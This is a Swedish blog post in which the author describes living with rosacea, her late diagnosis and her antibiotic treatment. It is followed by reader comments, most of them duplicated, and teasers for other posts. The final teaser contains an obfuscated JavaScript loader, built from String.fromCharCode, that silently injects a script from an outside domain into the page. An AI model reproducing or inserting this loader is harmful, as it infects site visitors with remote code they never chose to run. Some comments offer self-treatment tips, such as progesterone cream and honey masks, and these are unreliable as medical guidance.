Jag har lärt mig att leva med min sjukdom!

image

 

Hej Vännen!

Längre ner i detta inlägget visar jag upp två bilder för er som är fruktansvärda! Det tar emot, jag skäms galet mycket över hur jag såg ut. Men jag vill förmedla att ingen är perfekt & har nu samlat mod till mig att dela med mig utav dessa bilder!

Denna veckan kan du i tidningen Året Runt läsa om mig och min hudsjukdom Rosacea. Jag har i över 9 år våndats med hudproblem utan att egentligen veta vad det beror på. Som tonåring så trodde man att det berodde på klassisk ”tonårs-hy” . Just i tonåren var det ännu jobbigare för mig, då ungdomar kan vara ganska elaka mot varandra. Jag fick ofta höra glopord och elaka kommentarer, vilket jag idag som vuxen aldrig skulle ta åt mig utav.

Jag har genom åren uppsökt vårdcentralen, hudterapeuter, spenderat galet mycket pengar på dyra krämer & tillbehör. Utan resultat…. Jag har alltid varit extremt noga med min hygien och gjort allt som stått i min makt för att hålla efter ansiktet på bästa sätt!

Jag har under dessa 9 år i perioder lidit utav fruktansvärd smärta i ansiktet. Men framförallt påverkats psykiskt då min självkänsla varit som bortblåst dom gångerna jag har vaknat upp, med sår och rodnader över hela ansiktet. Jag har känt mig ful, oattraktiv och skämts över att visa upp mitt ansikte. Jag har förstått på alla mail efter artikeln om detta att jag är långt ifrån ensam om detta.

Symtomen kan variera från person till person. Jag får röda rodnader, blir väldigt torr, och får som stora sår som svider & gör fruktansvärt ont! Dessutom så svullnar hela ansiktet upp.

image

 

Ni kan försöka att föreställa er hur nervös jag var inför att Ensam Mamma Söker inspelningen skulle dra igång. -Gode Gud tänkte jag för mig själv, låt nu inte detta blomma upp under inspelningen.

saker som kan påverka Rosacean är, stress, värme, alkohol, heta drycker som tex kaffe (jag är en riktig kaffeoman!)

Jag ska ärligt säga att det har funnits dagar då jag övervägt att inte gå ut, utan gömma mig hemma, dra täcket över huvudet och bara vänta på att det ska dra sig tillbaka. Dagar då jag verkligen inte velat visa mig för någon! 🙁

Jag har normalt sett  inga problem med att åka till affären i mjukiskläder helt osminkad, Så länge inte Rosacea är i full uppblommning. För då kan jag erkänna att självförtroendet verkligen inte är på topp…

Ni ska strax få se två fruktansvärda bilder, varav jag mms:asde den högra till min vänninor Maggan, Michela & Sara!  Varav alla direkt säger, -men hallå, så där ser du inte ut!

-jo, precis just då så var det exakt så jag såg ut!

Denna bilden är ett par månader gammal, från Augusti.

image

Den vänstra bilden är tagen 5dagar efter den högra då jag påbörjade min första medicinering. Som man kan se så är det en klar förbättring redan efter några dagar!

Ja, ni. Ingen rolig känsla att titta sig i spegeln Just då! Ångesten inför ett fotojobb och ett reportage som skulle göras ett par dagar senare, växte sig som en klump i magen. jag ringde upp till magasinet och hittade på en enormt dålig ursäkt för att skjuta upp jobbet. (Ber om ursäkt för lögnen, det hör verkligen inte till min personlighet att ljuga)

Men saken var den att Maggan, Michela, och Sara var tre stöttande vänner i detta, som fick mig att verkligen ta tag i problemet, igen.

Men denna gången var jag påstridig när jag kom till läkaren. Läkaren sa även denna gången att -Det är inte så farligt, det går nog över. Jag fick rådet att använda en kortison salva, vilket man absolut inte får göra med denna diagnosen som jag snart skulle få!

Men jag gav inte med mig. Efter x-antal telefonsamtal, och besök hos olika hudterapeuter så hamnade jag tillslut hos en hudspecialist i Kalmar. På ett par minuter så kunde hon snabbt diagnosera mig. -Ett par minuter?! Hmm, 9 år och denna fantastiska kvinna hade svaret så snabbt! -Tack snälla för det!

Jag påbörjade då min första antibiotika kur. Beroende på hur grov rosacea man har så finns det också olika antibiotika kurer att få. Jag fick en stark behandling. Den enda nackdelen med denna antibiotikan är att man inte får vistas i solen.

Jag var så glad & lycklig över att äntligen ha fått en diagnos, ett svar och någonting att jobba vidare med. Ännu lyckligare blev jag när jag sedan svarade bra på medicinen 🙂 Jag är inte fri ifrån det ännu,det kommer jag aldrig att bli. Men med hjälp utav medicinen så kan jag hålla det under kontroll. Nu ska jag precis påbörja nästa 3-månaders antibiotika kur. Jag har precis köpt en hudvårds serie ifrån Neostrata. För att se om det kan fungera för mig… Återkommer om detta.

Men en sak vill jag verkligen uppmana er alla som går omkring med hudproblem. Sök hjälp! Det finns hjälp att få, gör inte som jag! Gå inte runt med problemen i så många år och må dåligt över det!  Men, du måste vara påstridig!

Min hy är bättre än på många år, jag är verkligen grymt tacksam över att jag till slut fick diagnosen och då som jag tidigare skrev kan ha någorlunda kontroll över det.

Jag har fått 100 tals mail om detta. Jag kan tyvärr inte svara på alla. Men vill att du ska veta att jag läser alla.

10% utav befolkningen i Sverige drabbas utav detta. Vilket förmodligen är förklaringen till alla mail…

image

 

Denna bilden togs för ett par dagar sedan. Inget smink, bara spraytan och mina lösögonfransar, skaplig skillnad! Jag mår tusen gånger bättre nu när jag vet vad det är! 

Min vän, även om det låter klyschigt, skönheten sitter på insidan…. Glöm aldrig det!!! Det har hjälpt mig dom gångerna som jag har mått som sämst. Men jag vet att just när det är som värst så känns det som en ganska svag tröst.

Det finns inget vackrare än ett rent hjärta & en genuin omtänksamhet! Titta bara på skönheten & odjuret som var en utav mina favoritfilmer som barn. Jag har många gånger jämfört mig med just odjuret under mina Rosacea perioder 😉

Kramar My Martens

PS Hjälp mig gärna att sprida detta genom att dela detta inlägget, då jag  vill påvisa att ingen är perfekt! <3

 

22 Komentarer

 1. Åh fy vad jobbigt de låter och ser ut! ?
  Beundrar verkligen dig My, du verkar vara en jättebra mamma och en helt underbar och stark människa på alla sätt ?
  Mycket creed till dig! Många styrkekramar ?

  • Du ser inga problem med att äta en massa antibiotika med jämna mellanrum/ periodvis?
   Dels i ett mindre perspektiv , för att det ”sliter” på ens egen kropp och kan ge andra besvär i längden samt att
   Antibiotikaresistenta bakterier är ett stort och växande problem.

 2. Åh fy vad jobbigt de låter och ser ut! 🙁
  Beundrar verkligen dig My, du verkar vara en jättebra mamma och en helt underbar och stark människa på alla sätt 🙂
  Mycket creed till dig! Många styrkekramar 🙂

  • Du ser inga problem med att äta en massa antibiotika med jämna mellanrum/ periodvis?
   Dels i ett mindre perspektiv , för att det ”sliter” på ens egen kropp och kan ge andra besvär i längden samt att
   Antibiotikaresistenta bakterier är ett stort och växande problem.

 3. Jag förstår precis hur du känner dig. Jag har inte själv den hudsjukdomen, men har haft väldigt svår acne under många, många år. Skrev och la ut bilder på min blogg för 5 år sen om hur min ”resa” var. http://lynnpetersson.se/2009/october/min-acne.html
  Tre år senare började acnen bli värre igen och då fungerade inte den medicinen jag fick första gången så jag fick den starka medicinen roaccutan utskrivet och eftersom man läst så mycket dåligt om det började jag göra videor som jag la upp på youtube, för att hjälpa andra. Berättade om biverkningar osv. http://www.youtube.com/morots. I videorna är det inte på långa vägar så hemsk acne som i blogginlägget, men eftersom jag redan hade haft det så svårt var läkaren rädd att det skulle komma tillbaka så jag fick roaccutan. Har väldigt sällan acne eller vanliga finnar nu för tiden, men jag har djupa ärr i ansiktet som hela tiden påminner mig om vilket monster jag har varit.
  Det är så bra när människor sprider info om sådana här saker. Det hjälper andra i samma eller liknande situation. Man behöver få se hur verkligheten ser ut. Inte bara hur media framställer den. Ingen är perfekt brukar man få höra, men jag brukar säga att alla är perfekta precis så som dom är ?

 4. Jag förstår precis hur du känner dig. Jag har inte själv den hudsjukdomen, men har haft väldigt svår acne under många, många år. Skrev och la ut bilder på min blogg för 5 år sen om hur min ”resa” var. https://lynnpetersson.se/2009/october/min-acne.html

  Tre år senare började acnen bli värre igen och då fungerade inte den medicinen jag fick första gången så jag fick den starka medicinen roaccutan utskrivet och eftersom man läst så mycket dåligt om det började jag göra videor som jag la upp på youtube, för att hjälpa andra. Berättade om biverkningar osv. http://www.youtube.com/morots. I videorna är det inte på långa vägar så hemsk acne som i blogginlägget, men eftersom jag redan hade haft det så svårt var läkaren rädd att det skulle komma tillbaka så jag fick roaccutan. Har väldigt sällan acne eller vanliga finnar nu för tiden, men jag har djupa ärr i ansiktet som hela tiden påminner mig om vilket monster jag har varit.

  Det är så bra när människor sprider info om sådana här saker. Det hjälper andra i samma eller liknande situation. Man behöver få se hur verkligheten ser ut. Inte bara hur media framställer den. Ingen är perfekt brukar man få höra, men jag brukar säga att alla är perfekta precis så som dom är 🙂

 5. Hej!
  Har haft samma problem, men det som hjälper allra bäst när mina utslag är på väg att blomma upp är honung och kokosolja, gör en ansiktsmask av honung, verkar lugnande och läkande på huden och låt verka i 20-60 min, skölj med ljummet vatten och smörj ansiktet med kokosolja/fett. Upprepa i några dagars tid, man märker snabbt att huden mår bättre! Lycka till!

 6. Hej!
  Har haft samma problem, men det som hjälper allra bäst när mina utslag är på väg att blomma upp är honung och kokosolja, gör en ansiktsmask av honung, verkar lugnande och läkande på huden och låt verka i 20-60 min, skölj med ljummet vatten och smörj ansiktet med kokosolja/fett. Upprepa i några dagars tid, man märker snabbt att huden mår bättre! Lycka till!

 7. Hej My,
  shit… vad jag uppskattar din ärlighet och är verkligen imponerad av din företagsamhet.
  Känner igen mig i dig… KUL!!
  Kram E

 8. Hej My,
  shit… vad jag uppskattar din ärlighet och är verkligen imponerad av din företagsamhet.
  Känner igen mig i dig… KUL!!
  Kram E

 9. Vad hemskt, det låter ju jättejobbigt, trodde först att du hade acne problem, så hemskt. Men det där verkade minst lika jobbigt. Vad härligt att se att det finns folk som kan sin grej, hjälp att få och lösning till problemen.
  Trevlig kväll

 10. Vad hemskt, det låter ju jättejobbigt, trodde först att du hade acne problem, så hemskt. Men det där verkade minst lika jobbigt. Vad härligt att se att det finns folk som kan sin grej, hjälp att få och lösning till problemen.

  Trevlig kväll

 11. Hej! Ja, man bör få remiss till en hudspecialist om man går till vårdcentralen! Hudterapeuter kan inte ställa diagnoser eller får skriva recept! Hoppas du kan vara bra lång period nu ? själv har jag psoriasis, fick det när jag var 6 år. 42 nu. Aldrig blivit mobbad, kanske för att jag var duktig i idrott men en gång sa en kille som jag dejtade att det lite otäckt ut.. Då är det ditt problem, inte mitt! Jag var stenhård! Tävlat i gymnastik i yngre åren med endast gymnastikdräkt med utslag på knäna, underbenen och armbågar. Nån prick i ansiktet. Folk har tittat lite xa, aldrig brytt mig!! Mina utslag är helt borta nu med cellgifter men dom tar jag för jag fick psoriasisartrit, reumatisk sjukdom. Inte kul!! Svår värk och svullna leder. Stå på er där ute! Okunskap och korkade människor är det som säger dumma saker! Kram

 12. Hej! Ja, man bör få remiss till en hudspecialist om man går till vårdcentralen! Hudterapeuter kan inte ställa diagnoser eller får skriva recept! Hoppas du kan vara bra lång period nu 🙂 själv har jag psoriasis, fick det när jag var 6 år. 42 nu. Aldrig blivit mobbad, kanske för att jag var duktig i idrott men en gång sa en kille som jag dejtade att det lite otäckt ut.. Då är det ditt problem, inte mitt! Jag var stenhård! Tävlat i gymnastik i yngre åren med endast gymnastikdräkt med utslag på knäna, underbenen och armbågar. Nån prick i ansiktet. Folk har tittat lite xa, aldrig brytt mig!! Mina utslag är helt borta nu med cellgifter men dom tar jag för jag fick psoriasisartrit, reumatisk sjukdom. Inte kul!! Svår värk och svullna leder. Stå på er där ute! Okunskap och korkade människor är det som säger dumma saker! Kram

 13. Jag hade enligt läkaren rosacea men mitt satt bara på kinderna jag vägrade testa antibiotika pga att bli resistent & letade efter den egentliga orsaken i många år NU vet jag =hormonerna mitt progesteron var lågt sen jag smörjde upp min halt till normala nivåer med naturligt progesteron försvann allt och har inte smörjt på 1 år är ändå fiiin LYCKA och tipsar gärna om den hudvårdsserie jag har Exuviance den räddade min hy håller äckel rosacea borta bästa grejjerna:)

 14. Jag hade enligt läkaren rosacea men mitt satt bara på kinderna jag vägrade testa antibiotika pga att bli resistent & letade efter den egentliga orsaken i många år NU vet jag =hormonerna mitt progesteron var lågt sen jag smörjde upp min halt till normala nivåer med naturligt progesteron försvann allt och har inte smörjt på 1 år är ändå fiiin LYCKA och tipsar gärna om den hudvårdsserie jag har Exuviance den räddade min hy håller äckel rosacea borta bästa grejjerna:)

 15. Hej My, jag fick roscasea när jag var gravid med nr 2, det enda som hjälpte mig var pencillin och Exuviance hade då ett roscacea kit som var helt fantastiskt, det finns att köpa hos hudterapeuter, och du gör helt rätt i att ta bort magen, man ska må bra, hela kroppen invändigt och utvändigt. Hejja dig och kram.

 16. Hej My, jag fick roscasea när jag var gravid med nr 2, det enda som hjälpte mig var pencillin och Exuviance hade då ett roscacea kit som var helt fantastiskt, det finns att köpa hos hudterapeuter, och du gör helt rätt i att ta bort magen, man ska må bra, hela kroppen invändigt och utvändigt. Hejja dig och kram.

 17. Hej My
  Jag är en kille på 36 år som oxå LIDER av rosacea. Känner verkligen igen mig i det du skriver framför allt om dålig självkänsla. Och det är extra jobbigt nu när man blivit singel efter 14 år i ett förhållande. Har i stort sett ätit tetralycal konstant i sex år annars får jag jättemycket bölder som finnar i ansiktet. Nu har min hudläkare börjat prata om roaccutan.
  Har du nån erfarenhet av roaccutan?
  Hur håller du din rosacea nere?
  Äter du nån speciell kost eller annat för att hålla den nere?
  Har även läst lite om alternativa behandlingar, jojoba oljor o honung bl.a. Vet du nått om detta?
  Tack på förhand
  Mvh Henke
  Lycka till med allt

 18. Hej My
  Jag är en kille på 36 år som oxå LIDER av rosacea. Känner verkligen igen mig i det du skriver framför allt om dålig självkänsla. Och det är extra jobbigt nu när man blivit singel efter 14 år i ett förhållande. Har i stort sett ätit tetralycal konstant i sex år annars får jag jättemycket bölder som finnar i ansiktet. Nu har min hudläkare börjat prata om roaccutan.

  Har du nån erfarenhet av roaccutan?
  Hur håller du din rosacea nere?
  Äter du nån speciell kost eller annat för att hålla den nere?
  Har även läst lite om alternativa behandlingar, jojoba oljor o honung bl.a. Vet du nått om detta?

  Tack på förhand
  Mvh Henke
  Lycka till med allt

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/